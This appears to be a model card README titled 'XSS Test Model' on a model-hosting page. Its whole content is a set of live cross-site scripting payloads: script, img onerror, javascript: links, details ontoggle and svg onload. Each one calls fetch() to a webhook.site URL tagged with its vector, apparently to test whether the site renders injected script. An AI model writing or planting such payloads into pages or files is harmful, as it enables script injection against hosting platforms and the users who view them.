| --- |
| language: |
| - en |
| --- |
| |
| # XSS Test Model |
|
|
| <script>fetch('https://webhook.site/21a44697-82b7-41f0-b934-42afa1a61a24/xss-script')</script> |
|
|
| <img src="x" onerror="fetch('https://webhook.site/21a44697-82b7-41f0-b934-42afa1a61a24/xss-img-err')"> |
|
|
| <a href="javascript:fetch('https://webhook.site/21a44697-82b7-41f0-b934-42afa1a61a24/xss-href')">click me</a> |
|
|
| <details ontoggle="fetch('https://webhook.site/21a44697-82b7-41f0-b934-42afa1a61a24/xss-details')"><summary>More info</summary>hidden</details> |
|
|
| <svg/onload="fetch('https://webhook.site/21a44697-82b7-41f0-b934-42afa1a61a24/xss-svg')"> |
|
|
| [link](javascript:fetch('https://webhook.site/21a44697-82b7-41f0-b934-42afa1a61a24/xss-md-link')) |
|
|
|  |
|
|